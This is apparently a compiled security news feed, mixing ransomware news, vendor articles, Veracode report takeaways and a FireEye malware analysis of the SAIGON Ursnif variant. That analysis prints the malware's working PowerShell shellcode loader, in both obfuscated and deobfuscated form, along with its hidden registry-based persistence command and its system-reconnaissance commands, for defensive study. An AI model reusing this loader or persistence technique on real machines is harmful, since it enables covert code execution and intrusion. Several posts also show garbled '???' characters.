This ten-minute course introduces employees to the associated risks and describes the link between phishing and ransomware. Armed with this knowledge, your staff will be better equipped to detect suspicious emails and know how to respond.

Learn more


 

The post Travelex says it won’t pay ransom to crooks as currency chaos continues appeared first on IT Governance UK Blog.

20 IT resolutions for 2020

Even in the high-touch field of healthcare, where human interactions remain core to the delivery of most services, IT exec Bill Fandrich feels the pressure to bring technology-fueled transformations to bear.

Fandrich, senior vice president and CIO of Blue Cross Blue Shield of Michigan, says he must focus on how to use technology to create higher quality, more affordable services as well as to improve interactions for administrators, medical providers and patients. And he must determine, out of all the technology options available, which ones deliver the most returns for the best value based on his company’s overall goals and objectives.

He takes the pressure in stride, saying: “It’s kind of amazing being in technology now because there has not been a more impactful time when it comes to the value and importance of IT.”

To read this article in full, please click here

(Insider Story)

Securing Interactive Kiosks IoTs with the Paradox OS

Article by Bernard Parsons, CEO, Becrypt

Whether it is an EPOS system at a fast food venue or large display system at a public transport hub, interactive kiosks are becoming popular and trusted conduits for transacting valuable data with customers.

The purpose of interactive kiosks, and the reason for their increasing prevalence, is to drive automation and make processes more efficient. For many businesses and government departments, they are the visible and tangible manifestations of their digital transformation.

Kiosks are information exchanges, delivering data and content; ingesting preferences, orders and payments. With so much data going back and forth, there is huge value, however, wherever there is value you’ll find malicious and criminal activities seeking to spoil, subvert or steal it
.

Three categories of Cyber Threat
Kiosks are just the latest in a long line of data-driven objects that need protecting. At stake is the very heart (and public face) of digitally evolved organisations.

Threats to kiosks come in three principal forms:
  • Threats to system integrity – where kiosks are compromised to display something different. Losing control of what your kiosks look like undermines your brand and causes distress to customers. A recent example is of a well-known sportswear store in New Zealand, where a kiosk displayed pornography for 9 hours before employees arrived the next morning to disconnect it. 
  • Threats to system availability – where kiosks are compromised to display nothing. In other words, they go offline and, instead of displaying some kind of reassuring ‘out of order’ message, give the appearance of a desktop computer with frozen dialogue boxes or raw lines of code. Examples of this are all too common, but are typically characterised by ‘the blue screen of death’. 
  • Threats to system confidentiality – where kiosks show no outward signs of compromise, but are in fact collecting data illegally. Such attacks carry significant risk over and above creating nuisance or offence. Examples include one of the largest self-service food vending companies in the US suffering a stealthy attack whereby the payment card details and even biometric data gleaned from users at kiosks may have been jeopardised.
The challenge of curbing these threats is compounded by interactive kiosks’ great virtue: their connectedness. As with any Internet of Things (IoT) endpoint architecture, the potential routes for attack are numerous and could spread from attacks on a company’s internal network, stem from vulnerabilities in kiosk application software, or even result from a direct assault on the kiosk itself.

How Best Practice Regulatory Standards Apply to Kiosks
Regulatory compliance plays a part here, with the EU GDPR and NIS directive (ably supported by comprehensive guidance proffered via the UK NCSC Cyber Assessment Framework) compelling organisations to consider all parts of their endpoint estates with appropriate operational controls, processes and risk management approach in respect of – for example – patch management, privileged user access and data encryption.

Regulatory reforms are all well and good, but technology (AI, machine learning, blockchain, etc.) is evolving rapidly and organisations must be as proactive about the cybersecurity challenge as possible or risk falling behind the digital innovation curve.

Becrypt work with the UK Government and the National Cyber Security Centre (NCSC), to develop solutions in line with core objectives sought by NIS and other regulations, for use in public sector environments. At the same time, we are seeing private sector businesses increasingly coming under the sorts of cyberattacks more commonly associated with the public sector.

Paradox: The Secure, Linux-based OS for Interactive Kiosks
Government research has determined that the best way to mitigate threats to interactive kiosks, and safeguard wider digital transformation objectives, is to secure the kiosk operating system (OS).

Becrypt have developed in collaboration with NCSC, Paradox, a secure Linux-based OS and management platform for kiosks. Paradox incorporates a secure-by-design architecture, ensuring kiosks remain in a known healthy state, free of malware. For organisations concerned about the potential for attack, this provides absolute certainty that every time a machine is switched on, its OS and all its applications have not been compromised.

Likewise, another common concern with kiosks is managing hundreds or even thousands of geographically dispersed devices without being able to check on or remediate system health. Should it detect anything unusual, Paradox will automatically rollback to the last known good state, presenting a functioning system rather than an offline/unavailable one. This avoids the onset of ‘bluescreen’ failures and allows administrators to visualise and manage kiosks in an easy and low-cost way. Automated security and patch management further ensures that devices are always kept up-to-date.

Paradox is also a very lightweight OS, which shrinks the potential attack surface and ensures the entire kiosk estate is not susceptible to common exploits. It also carries a number of advanced security controls that make it more difficult to attack, such as a sandboxed user account for privilege escalation prevention. OS components are also mounted as ‘read-only’, thereby preventing persistent, targeted attacks.

Spurred on by consumer demand for deeper interactions and easier, more personalised experiences, the exponential growth in interactive kiosks is plain to see in public spaces everywhere. And as this shift encourages more private and public sector organisations to do more with their data, the onus is on all of us to protect it.

State of Software Security v10: 5 Key Takeaways for Developers

In case you missed it, this year we launched our 10th annual State of Software Security (SOSS X) report! Armed with a decade of data, the Veracode team analyzed 85,000 applications to study trends in fix rates, mounting security debt, shifts in vulnerability by language, and more.

What did we uncover? At the core of our research, we found there???s still a need for better remediation processes and more frequent security scans. But we also uncovered some best practices that are leading to significant application security improvements. Read on for a snapshot of key takeaways that can help set you and your organization up for AppSec success in 2020.

Most apps still don???t pass crucial compliance tests

OWASP Top 10 vulnerabilities and SANS 25 software errors represent consensus listings of the most critical flaws in the industry, and while we???ve seen some changes in compliance rates across past editions of our SOSS report, the 10-year trend shows us that things haven???t shifted much as of late. Today, 68 percent of apps fail to pass OWASP on initial scan (down from 77 percent in volume one of SOSS), and 67 percent of apps fail to pass SANS on initial scan ???the same figure in volume one as volume ten.

The fact that these common and serious vulnerabilities are still prevalent in code underscores the fact that we are not creating environments where developers can code securely. The absence of proper secure coding training, as well as the lack of access to the right tools, is clearly creating risk.

Android, PHP, iOS, and C++ have a high frequency of flaws

This year???s data analysis found that over 90 percent of Android, PHP, and iOS applications contain security flaws on initial scan. Ranking over 80 percent were C++, .NET, and Java, while Python and JavaScript came in with the lowest flaw rates.

Language Scans

Why do we see a higher rate of flaws in mobile languages? Perhaps the reason Android and iOS are two of the top offenders is that many mobile applications aren???t properly scanned before they???re uploaded to the Apple App Store and the Google Play Store. Ben Greenwald, Director of Software Engineering at Veracode, explains further: 

???One reason Android and iOS applications may tend to have more security flaws on first scan is because mobile developers believe they are already covered. Developers might assume that Apple and Google thoroughly test apps before they???re released, or they rely on Apple and Google for testing under the assumption that a security infrastructure is already in place.???

This issue only further highlights the need for thorough internal and third-party testing processes to ensure that your applications are secure.

Language also adds yet another layer to the issue of unfixed flaws piling up on developer plates; the average security debt for PHP and C++ is massive compared to that of .NET, Android, Java, and JavaScript.

Language Flaw Debt

As two of the top languages for flaw rates, it makes sense that unchecked issues in PHP and C++ can spin out of control for development teams. So, what???s their deal? PHP???s start in the mid 90s came with a basic design that works well for smaller applications and beginners learning to code, but it has since been so widely adopted and stretched beyond its means that it is left highly vulnerable to flaws.

C++ is an incredibly robust language that powers many of the operating systems, browsers, and productivity apps that we use in our daily life. But with that great power comes the great responsibility to manage memory, guard against use-after-free, and keep stacks from exceeding the fill line. These flaws tend to accumulate over time and are easier to introduce than in many of the today???s more commonly used higher-level languages.

While some applications are prone to debt buildup because they use multiple languages or a basic flaw-heavy language like PHP, it???s important to consider the steps your team can take to counterbalance the prevalence of flaws???like reprioritization. 

Remediation priorities are misaligned for top vulnerabilities

Out of the 85,000 applications tested (including 1.4 million individual scans), our data shows that 83 percent of apps have at least one flaw when they???re initially scanned. That???s an 11 percent increase from volume one to volume ten of the SOSS report - but the good news is we also saw an overall 14 percent decrease in applications with high-severity flaws.

The bad news? Focus is, it seems, not always placed on fixing the right flaws. For example, we found that A10-Logging is ranked the lowest in flaw prevalence but is at the top of the list for fix rate, the bottom of the list for incidents, and doesn???t rank for exploit risk. A5-Access Control is another mystifying trend. It ranks low in prevalence but towards the top of exploit and incident rankings, falling right in the middle of the list for fix rate.

Some flaws and fixes are consistent, though. Both A1-Injection and A2-Authentication sit toward the top of the list across the board, while A8-Deserialization is reliably stable in the bottom half of each category. This discrepancy sheds some light on which flaws are neglected, deferred, targeted, and prioritized, and how DevOps teams can more efficiently rank issues.

Flaws that can be remediated quickly on a small scope are naturally resolved ahead of flaws that are slightly more complicated, but often those severe issues are less difficult to fix, underscoring the need for a more comprehensive plan of attack.

Developers favor recency, adding to security debt

SOSS X shows us that developers typically follow a LIFO (Last In, First Out) method instead of a FIFO (First In, First Out) approach. With LIFO, developers run the risk of contributing to security debt when older flaws are stacked underneath newer issues. As time goes by, the probability of remediation drops significantly, and any unmitigated remnants slide into the land of security debt.

This trend highlights an ongoing battle with security debt across the industry and draws attention to how it muddies the waters of remediation. Fortunately, we have revealing data on scanning cadence that can help reduce an organization???s debt over time.

Bursty scans contribute to security debt???but it???s reversible

We mention security debt throughout the SOSS X report (and this post) because it can leave organizations vulnerable to attacks in the backlog of flaws, and slower to mitigate issues that arise out of the blue.

The good news is, this year we also uncovered evidence of practices that are chipping away at security debt. It???s all about scanning frequency. We know that ???bursty??? scanning cadences result in a higher prevalence of flaws over time, as opposed to steady and early scan processes with fewer flaws open at once. Sometimes bursty scanning simply fits your waterfall development cycle or pairs with testing schedules that are event-driven, but this can leave security holes where flaws are missed month to month.

Bursty Scans

Based on our data, we know that development teams can improve their median time to remediation (MedianTTR) by about 70 percent with established procedures and consistent testing schedules. Automating your processes to increase scanning tempo and improve prioritization reduces the security debt that your organization carries.

Read the report

Want to see all this data in one complete package? Read the full SOSS report to learn more about the state of DevSecOps, discover additional data highlights by industry, and more.

The state of digital transformation in 2020

The past year has seen many businesses question exactly how transformational digital transformation really is. The answer, as with all IT initiatives, depends on the scope of the ambition, the skill of the leadership, and the ultimate degree of business impact.

Yet we’ve seen a pattern emerge: Those with transformational aspirations discover that boil-the-ocean schemes seldom meet their objectives, while carefully planned and targeted initiatives often have broader benefit than even the original instigators imagined.

The latter is particularly true of initiatives that reform fundamental processes. Transformation usually implies moving from one fixed state to another, yet digital transformation at its best involves a journey from inflexibility to a “permanently agile” condition. Getting there may involve the adoption of new programming, infrastructure, or internet-of-things advances. The biggest rewards, however, accrue from reimagining workflows to accommodate continuous change and establishing mechanisms that continuously measure results.

To read this article in full, please click here

Advisory 2020-001-4: Active exploitation of critical vulnerability in Citrix Application Delivery Controller and Citrix Gateway

The Australian Signals Directorate’s Australian Cyber Security Centre (ACSC) is aware of ongoing attempts to exploit a critical vulnerability in Citrix Application Delivery Controller (ADC) (formerly known as NetScaler ADC), Citrix Gateway (formerly known as NetScaler Gateway) and Citrix SD-WAN WANOP. The vulnerability, known as CVE-2019-19781, was disclosed on 17 December 2019 and enables an unauthenticated adversary to execute arbitrary code.

The Consequences of Security Breaches Are Becoming More Severe

With the prevalence of cyberattacks, breaches, and data leaks heading into 2020, it???s becoming commonplace for employees to part ways with their organization after a security incident. Although the consequences from a breach were less severe in the past, reactions are shifting as data leaks are deemed more dire than ever before.

A 2018 report from Kaspersky Lab surveyed 6,000 people in 29 countries and found that, globally, 31 percent of cybersecurity incidents resulted in the layoff of employees at impacted companies. In roughly a third of these cases, those employees holding senior IT positions were most often let go from their roles after a breach or security incident.

The results from Kaspersky???s survey also revealed that 32 percent of C-level managers and CEOs in the United States were laid off post-breach. That number is lower in other countries but still higher overall than most functional roles within and outside of IT, representing a growing trend in how organizations respond to breach backlash. As cybersecurity professionals are in high-demand and C-level managers cost a pretty penny, making the decision to part ways is not always easy.

Weathering the post-breach storm

With great power comes great responsibility. In 2017, the CIO of Equifax U.S. Information Solutions, Jun Ying, was sent to jail and forced to pay $55,000 for insider trading after it was discovered that he shared information about a breach before it was made public by the company. In the same year, Uber???s CSO Joe Sullivan was let go after he allegedly helped cover up a bug bounty pay-out for over $100,000, paying attackers in exchange for the deletion of stolen data on 57 million drivers and passengers. Both Sullivan and security lawyer Craig Clark were fired from the company.

Sometimes privacy-minded employees clash with their own organization???s policies and can eliminate a role altogether. For example, Facebook???s former CSO, Alex Stamos, left a security role at the social media powerhouse after he allegedly disagreed with how Facebook handled the very public Cambridge Analytica scandal. In 2018, Facebook made the decision not to replace Stamos and to instead rely on introducing security engineers, analysts, investigators, and other specialists into their engineering and product teams. It was a testament to how fast things can change within an organization???s security team.

In other situations, ex-employees can cause unanticipated headaches with ripple effects of their own. Capital One fell prey to cyberattacker Paige Thompson when she infiltrated the company???s third-party cloud server to access 106 million customer records in 2019. Thompson, previously an Amazon Web Services software engineer, allegedly built a scanning tool that looked for misconfigured cloud servers on the web providing easy access to username and password credentials.

These examples lead to a logical question: if your business is unable to fortify its internal processes and protect sensitive information, is it trustworthy to consumers? With a solid plan for security and remediation in place, the risk of job loss and consumer distrust diminishes.

Getting serious about your security

As breaches and cyberattacks lead to high-profile firings that play out in the media, the public is paying attention. A recent IDG Survey Report, Security as a Competitive Advantage, found that 66 percent of respondents are more likely to work with a vendor whose application security has been validated by an established, independent expert.

Additionally, 99 percent of those surveyed for the report welcome the advantages of working with a certified and secure vendor, such as improved protection of IP data that leads to peace of mind for their customers. There are measures your organization can take to boost customer confidence, give you a competitive advantage, and potentially prevent the loss (monetary or otherwise) from a breach or cyberattack.

In addition to incorporating security testing into your software development, third-party validation of your security efforts shows prospects and customers alike that securing data is a top priority in your organization???s application development process.

Independent security validation comes with a number of benefits, enabling vendors to:

  • Proactively address any questions a prospect might have about security
  • Instill confidence in buyers that they???re choosing a vendor who cares about their data
  • Speed up sales cycles by eliminating the need for back-and-forth validation
  • Stay one step ahead of security concerns from customers and prospects
  • Integrate more efficiently with development teams to improve security

With third-party validation in place, you not only have proof positive that your organization cares about security, but also a roadmap for maturing your application security program. The risk of losing employees to high-profile incidents also diminishes. Eliminating concern and doubt sets you apart with a competitive advantage in the marketplace that sends a clear message to buyers: you???re serious about security.  

Learn how the Veracode Verified program can help position you as a trusted and secure vendor so that you???re ready when a prospect comes calling.

Cyber News Rundown: Snake Ransomware

Reading Time: ~ 2 min.

Snake Ransomware Slithers Through Networks

A new ransomware variant, dubbed “Snake,” has been found using more sophisticated obfuscation while targeting entire networks, rather than only one machine. In addition, Snake will append any encrypted file extensions with five random characters following the filetype itself. Finally, the infection also modifies a specific file marker and replaces it with “EKANS,” or SNAKE spelled backwards. A free decryptor hasn’t been released yet, and the malware authors have specified that that encryption will be for entire networks only.

Minnesota Hospital Data Breach

Sensitive information belonging to nearly 50,000 patients of a Minnesota hospital has been illicitly accessed after multiple employee email addresses were compromised. While in most cases the information accessed was medical data and basic contact info, some patients may have also had their Social Security and driver’s license numbers compromised. Alomere Health has already contacted affected patients and begun providing credit and identity monitoring services.

Cyberattack Finally Cracks Las Vegas Security

For a city that is the target of roughly 280,000 cyber attacks every month, one attack was finally able to make it through Las Vegas security protocols. The attack appears to have stemmed from a malicious email but was quickly quarantined by city IT officials before it could do any critical damage. Earlier in 2019, Las Vegas officials proposed a measure to refuse payments to any cybersecurity threat actors.

Travelex Falls Victim to Sodinokibi Ransomware

On the first day of 2020, foreign travel service provider Travelex experienced a ransomware attack that used unsecured VPNs to infiltrate their systems. To make matters worse, a demand of $6 million has been placed on the company for the return of their data, or else the ransom will be doubled. Since this attack, a scoreboard has been created to track the six additional victims of the Sodinokibi/REvil ransomware campaign.

ATM Skimmer Arrested in New York

At least one individual has been arrested in connection to an ATM skimming ring that has taken over $400,000 from banks in New York and surrounding states. From 2014 to 2016, this group installed card skimmers in an unidentified number of ATMs in order to steal card credentials and build up fraudulent charges. Eleven other people are connected with this incident and will also likely be charged.

The post Cyber News Rundown: Snake Ransomware appeared first on Webroot Blog.

Skype audio graded by workers in China with ‘no security measures’

Exclusive: former Microsoft contractor says he was emailed login after minimal vetting

A Microsoft programme to transcribe and vet audio from Skype and Cortana, its voice assistant, ran for years with “no security measures”, according to a former contractor who says he reviewed thousands of potentially sensitive recordings on his personal laptop from his home in Beijing over the two years he worked for the company.

The recordings, both deliberate and accidentally invoked activations of the voice assistant, as well as some Skype phone calls, were simply accessed by Microsoft workers through a web app running in Google’s Chrome browser, on their personal laptops, over the Chinese internet, according to the contractor.

Continue reading...

PHA Family Highlights: Bread (and Friends)





“So..good..”
“very beautiful”
Later, 1 star reviews from real users start appearing with comments like:
“Deception”
“The app is not honest …”

SUMMARY

Sheer volume appears to be the preferred approach for Bread developers. At different times, we have seen three or more active variants using different approaches or targeting different carriers. Within each variant, the malicious code present in each sample may look nearly identical with only one evasion technique changed. Sample 1 may use AES-encrypted strings with reflection, while Sample 2 (submitted on the same day) will use the same code but with plaintext strings.
At peak times of activity, we have seen up to 23 different apps from this family submitted to Play in one day. At other times, Bread appears to abandon hope of making a variant successful and we see a gap of a week or longer before the next variant. This family showcases the amount of resources that malware authors now have to expend. Google Play Protect is constantly updating detection engines and warning users of malicious apps installed on their device.

SELECTED SAMPLES

Package Name SHA-256 Digest
com.rabbit.artcamera 18c277c7953983f45f2fe6ab4c7d872b2794c256604e43500045cb2b2084103f
org.horoscope.astrology.predict 6f1a1dbeb5b28c80ddc51b77a83c7a27b045309c4f1bff48aaff7d79dfd4eb26
com.theforest.rotatemarswallpaper 4e78a26832a0d471922eb61231bc498463337fed8874db5f70b17dd06dcb9f09
com.jspany.temp 0ce78efa764ce1e7fb92c4de351ec1113f3e2ca4b2932feef46d7d62d6ae87f5
com.hua.ru.quan 780936deb27be5dceea20a5489014236796a74cc967a12e36cb56d9b8df9bc86
com.rongnea.udonood 8b2271938c524dd1064e74717b82e48b778e49e26b5ac2dae8856555b5489131
com.mbv.a.wp 01611e16f573da2c9dbc7acdd445d84bae71fecf2927753e341d8a5652b89a68
com.pho.nec.sg b4822eeb71c83e4aab5ddfecfb58459e5c5e10d382a2364da1c42621f58e119b

Dixons Carphone fined £500,000 for massive data breach

‘Systemic failures’ found in the retailer’s management and protection of customer data

Dixons Carphone has been hit with the maximum possible fine after the tills in its shops were compromised by a cyber-attack that affected at least 14 million people.

The retailer discovered the massive data breach last summer and a subsequent investigation by the Information Commissioner’s Office (ICO) found the attacker had installed malicious software on 5,390 tills in branches of its Currys PC World and Dixons Travel chains.

Continue reading...

SAIGON, the Mysterious Ursnif Fork

Ursnif (aka Gozi/Gozi-ISFB) is one of the oldest banking malware families still in active distribution. While the first major version of Ursnif was identified in 2006, several subsequent versions have been released in large part due source code leaks. FireEye reported on a previously unidentified variant of the Ursnif malware family to our threat intelligence subscribers in September 2019 after identification of a server that hosted a collection of tools, which included multiple point-of-sale malware families. This malware self-identified as "SaiGon version 3.50 rev 132," and our analysis suggests it is likely based on the source code of the v3 (RM3) variant of Ursnif. Notably, rather than being a full-fledged banking malware, SAIGON's capabilities suggest it is a more generic backdoor, perhaps tailored for use in targeted cybercrime operations.

Technical Analysis

Behavior

SAIGON appears on an infected computer as a Base64-encoded shellcode blob stored in a registry key, which is launched using PowerShell via a scheduled task. As with other Ursnif variants, the main component of the malware is a DLL file. This DLL has a single exported function, DllRegisterServer, which is an unused empty function. All the relevant functionality of the malware executes when the DLL is loaded and initialized via its entry point.

Upon initial execution, the malware generates a machine ID using the creation timestamp of either %SystemDrive%\pagefile.sys or %SystemDrive%\hiberfil.sys (whichever is identified first). Interestingly, the system drive is queried in a somewhat uncommon way, directly from the KUSER_SHARED_DATA structure (via SharedUserData→NtSystemRoot). KUSER_SHARED_DATA is a structure located in a special part of kernel memory that is mapped into the memory space of all user-mode processes (thus shared), and always located at a fixed memory address (0x7ffe0000, pointed to by the SharedUserData symbol).

The code then looks for the current shell process by using a call to GetWindowThreadProcessId(GetShellWindow(), …). The code also features a special check; if the checksum calculated from the name of the shell's parent process matches the checksum of explorer.exe (0xc3c07cf0), it will attempt to inject into the parent process instead.

SAIGON then injects into this process using the classic VirtualAllocEx / WriteProcessMemory / CreateRemoteThread combination of functions. Once this process is injected, it loads two embedded files from within its binary:

  • A PUBLIC.KEY file, which is used to verify and decrypt other embedded files and data coming from the malware's command and control (C2) server
  • A RUN.PS1 file, which is a PowerShell loader script template that contains a "@SOURCE@" placeholder within the script:

$hanksefksgu = [System.Convert]::FromBase64String("@SOURCE@");
Invoke-Expression ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("JHdneG1qZ2J4dGo9JGh
hbmtzZWZrc2d1Lkxlbmd0aDskdHNrdm89IltEbGxJbXBvcnQoYCJrZXJuZWwzMmAiKV1gbnB1YmxpYyBzdGF
0aWMgZXh0ZXJuIEludDMyIEdldEN1cnJlbnRQcm9jZXNzKCk7YG5bRGxsSW1wb3J0KGAidXNlcjMyYCIpXWB
ucHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIEdldERDKEludFB0ciBteHhhaHhvZik7YG5bRGxsSW1wb3J0K
GAia2VybmVsMzJgIildYG5wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgQ3JlYXRlUmVtb3RlVGhyZWFkKEl
udFB0ciBoY3d5bHJicywgSW50UHRyIHdxZXIsdWludCBzZmosSW50UHRyIHdsbGV2LEludFB0ciB3d2RyaWN
0d2RrLHVpbnQga2xtaG5zayxJbnRQdHIgdmNleHN1YWx3aGgpO2BuW0RsbEltcG9ydChgImtlcm5lbDMyYCI
pXWBucHVibGljIHN0YXRpYyBleHRlcm4gVUludDMyIFdhaXRGb3JTaW5nbGVPYmplY3QoSW50UHRyIGFqLC
BVSW50MzIga2R4c3hldik7YG5bRGxsSW1wb3J0KGAia2VybmVsMzJgIildYG5wdWJsaWMgc3RhdGljIGV4dG
VybiBJbnRQdHIgVmlydHVhbEFsbG9jKEludFB0ciB4eSx1aW50IGtuYnQsdWludCB0bXJ5d2h1LHVpbnQgd2d1
dHVkKTsiOyR0c2thYXhvdHhlPUFkZC1UeXBlIC1tZW1iZXJEZWZpbml0aW9uICR0c2t2byAtTmFtZSAnV2luMzI
nIC1uYW1lc3BhY2UgV2luMzJGdW5jdGlvbnMgLXBhc3N0aHJ1OyRtaHhrcHVsbD0kdHNrYWF4b3R4ZTo6Vml
ydHVhbEFsbG9jKDAsJHdneG1qZ2J4dGosMHgzMDAwLDB4NDApO1tTeXN0ZW0uUnVudGltZS5JbnRlcm9wU
2VydmljZXMuTWFyc2hhbF06OkNvcHkoJGhhbmtzZWZrc2d1LDAsJG1oeGtwdWxsLCR3Z3htamdieHRqKTskd
GRvY25ud2t2b3E9JHRza2FheG90eGU6OkNyZWF0ZVJlbW90ZVRocmVhZCgtMSwwLDAsJG1oeGtwdWxsLC
RtaHhrcHVsbCwwLDApOyRvY3h4am1oaXltPSR0c2thYXhvdHhlOjpXYWl0Rm9yU2luZ2xlT2JqZWN0KCR0ZG
9jbm53a3ZvcSwzMDAwMCk7")));

The malware replaces the "@SOURCE@" placeholder from this PowerShell script template with a Base64-encoded version of itself, and writes the PowerShell script to a registry value named "PsRun" under the "HKEY_CURRENT_USER\Identities\{<random_guid>}" registry key (Figure 1).


Figure 1: PowerShell script written to PsRun

The instance of SAIGON then creates a new scheduled task (Figure 2) with the name "Power<random_word>" (e.g. PowerSgs). If this is unsuccessful for any reason, it falls back to using the "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" registry key to enable itself to maintain persistence through system reboot.


Figure 2: Scheduled task

Regardless of the persistence mechanism used, the command that executes the binary from the registry is similar to the following:

PowerShell.exe -windowstyle hidden -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwASQBkAGUAbgB0AGkAdABpAGUAcwBcAHsANAAzAEIA
OQA1AEUANQBCAC0ARAAyADEAOAAtADAAQQBCADgALQA1AEQANwBGAC0AMgBDADcAOAA5AEMANQA5
AEIAMQBEAEYAfQAnACkALgBQAHMAUgB1AG4A

After removing the Base64 encoding from this command, it looks something like "iex (gp 'HKCU:\\Identities\\{43B95E5B-D218-0AB8-5D7F-2C789C59B1DF}').PsRun."  When executed, this command retrieves the contents of the previous registry value using Get-ItemProperty (gp) and executes it using Invoke-Expression (iex).

Finally, the PowerShell code in the registry allocates a block of memory, copies the Base64-decoded shellcode blob into it, launches a new thread pointing to the area using CreateRemoteThread, and waits for the thread to complete. The following script is a deobfuscated and beautified version of the PowerShell.

$hanksefksgu = [System.Convert]::FromBase64String("@SOURCE@");
$wgxmjgbxtj = $hanksefksgu.Length;

$tskvo = @"
[DllImport("kernel32")]
public static extern Int32 GetCurrentProcess();

[DllImport("user32")]
public static extern IntPtr GetDC(IntPtr mxxahxof);

[DllImport("kernel32")]
public static extern IntPtr CreateRemoteThread(IntPtr hcwylrbs, IntPtr wqer, uint sfj, IntPtr wllev, IntPtr wwdrictwdk, uint klmhnsk, IntPtr vcexsualwhh);

[DllImport("kernel32")]
public static extern UInt32 WaitForSingleObject(IntPtr aj, UInt32 kdxsxev);

[DllImport("kernel32")]
public static extern IntPtr VirtualAlloc(IntPtr xy, uint knbt, uint tmrywhu, uint wgutud);
"@;

$tskaaxotxe = Add-Type -memberDefinition $tskvo -Name 'Win32' -namespace Win32Functions -passthru;
$mhxkpull = $tskaaxotxe::VirtualAlloc(0, $wgxmjgbxtj, 0x3000, 0x40);[System.Runtime.InteropServices.Marshal]::Copy($hanksefksgu, 0, $mhxkpull, $wgxmjgbxtj);
$tdocnnwkvoq = $tskaaxotxe::CreateRemoteThread(-1, 0, 0, $mhxkpull, $mhxkpull, 0, 0);
$ocxxjmhiym = $tskaaxotxe::WaitForSingleObject($tdocnnwkvoq, 30000);

Once it has established a foothold on the machine, SAIGON loads and parses its embedded LOADER.INI configuration (see the Configuration section for details) and starts its main worker thread, which continuously polls the C2 server for commands.

Configuration

The Ursnif source code incorporated a concept referred to as "joined data," which is a set of compressed/encrypted files bundled with the executable file. Early variants relied on a special structure after the PE header and marked with specific magic bytes ("JF," "FJ," "J1," "JJ," depending on the Ursnif version). In Ursnif v3 (Figure 3), this data is no longer simply after the PE header but pointed to by the Security Directory in the PE header, and the magic bytes have also been changed to "WD" (0x4457).


Figure 3: Ursnif v3 joined data

This structure defines the various properties (offset, size, and type) of the bundled files. This is the same exact method used by SAIGON for storing its three embedded files:

  • PUBLIC.KEY - RSA public key
  • RUN.PS1 - PowerShell script template
  • LOADER.INI - Malware configuration

The following is a list of configuration options observed:

Name Checksum

Name

Description

0x97ccd204

HostsList

List of C2 URLs used for communication

0xd82bcb60

ServerKey

Serpent key used for communicating with the C2

0x23a02904

Group

Botnet ID

0x776c71c0

IdlePeriod

Number of seconds to wait before the initial request to the C2

0x22aa2818

MinimumUptime

Waits until the uptime is greater than this value (in seconds)

0x5beb543e

LoadPeriod

Number of seconds to wait between subsequent requests to the C2

0x84485ef2

HostKeepTime

The number of minutes to wait before switching to the next C2 server in case of failures

Table 1: Configuration options

Communication

While the network communication structure of SAIGON is very similar to Ursnif v3, there are some subtle differences. SAIGON beacons are sent to the C2 servers as multipart/form-data encoded requests via HTTP POST to the "/index.html" URL path. The payload to be sent is first encrypted using Serpent encryption (in ECB mode vs CBC mode), then Base64-encoded. Responses from the server are encrypted with the same Serpent key and signed with the server's RSA private key.

SAIGON uses the following User-Agent header in its HTTP requests: "Mozilla/5.0 (Windows NT <os_version>; rv:58.0) Gecko/20100101 Firefox/58.0," where <os_version> consists of the operating system's major and minor version number (e.g. 10.0 on Windows 10, and 6.1 on Windows 7) and the string "; Win64; x64" is appended when the operating system is 64-bit. This yields the following example User Agent strings:

  • "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0" on Windows 10 64-bit
  • "Mozilla/5.0 (Windows NT 6.1; rv:58.0) Gecko/20100101 Firefox/58.0" on Windows 7 32-bit

The request format is also somewhat similar to the one used by other Ursnif variants described in Table 2:

ver=%u&group=%u&id=%08x%08x%08x%08x&type=%u&uptime=%u&knock=%u

Name

Description

ver

Bot version (unlike other Ursnif variants this only contains the build number, so only the xxx digits from "3.5.xxx")

group

Botnet ID

id

Client ID

type

Request type (0 – when polling for tasks, 6 – for system info data uploads)

uptime

Machine uptime in seconds

knock

The bot "knock" period (number of seconds to wait between subsequent requests to the C2, see the LoadPeriod configuration option)

Table 2: Request format components

Capabilities

SAIGON implements the bot commands described in Table 3.

Name Checksum

Name

Description

0x45d4bf54

SELF_DELETE

Uninstalls itself from the machine; removes scheduled task and deletes its registry key

0xd86c3bdc

LOAD_UPDATE

Download data from URL, decrypt and verify signature, save it as a .ps1 file and run it using "PowerShell.exe -ep unrestricted -file %s"

0xeac44e42

GET_SYSINFO

Collects and uploads system information by running:

  1. "systeminfo.exe"
  2. "net view"
  3. "nslookup 127.0.0.1"
  4. "tasklist.exe /SVC"
  5. "driverquery.exe"
  6. "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s"

0x83bf8ea0

LOAD_DLL

Download data from URL, decrypt and verify, then use the same shellcode loader that was used to load itself into memory to load the DLL into the current process

0xa8e78c43

LOAD_EXE

Download data from URL, decrypt and verify, save with an .exe extension, invoke using ShellExecute

Table 3: SAIGON bot commands

Comparison to Ursnif v3

Table 4 shows the similarities between Ursnif v3 and the analyzed SAIGON samples (differences are highlighted in bold):

 

Ursnif v3 (RM3)

Saigon (Ursnif v3.5?)

Persistence method

Scheduled task that executes code stored in a registry key using PowerShell

Scheduled task that executes code stored in a registry key using PowerShell

Configuration storage

Security PE directory points to embedded binary data starting with 'WD' magic bytes (aka. Ursnif "joined files")

Security PE directory points to embedded binary data starting with 'WD' magic bytes (aka. Ursnif "joined files")

PRNG algorithm

xorshift64*

xorshift64*

Checksum algorithm

JAMCRC (aka. CRC32 with all the bits flipped)

CRC32, with the result rotated to the right by 1 bit

Data compression

aPLib

aPLib

Encryption/Decryption

Serpent CBC

Serpent ECB

Data integrity verification

RSA signature

RSA signature

Communication method

HTTP POST requests

HTTP POST requests

Payload encoding

Unpadded Base64 ('+' and '/' are replaced with '_2B' and '_2F' respectively), random slashes are added

Unpadded Base64 ('+' and '/' are replaced with '%2B' and '%2F' respectively), no random slashes

Uses URL path mimicking?

Yes

No

Uses PX file format?

Yes

No

Table 4: Similarities and differences between Ursnif v3 and SAIGON samples

Figure 4 shows Ursnif v3's use of URL path mimicking. This tactic has not been seen in other Ursnif variants, including SAIGON.


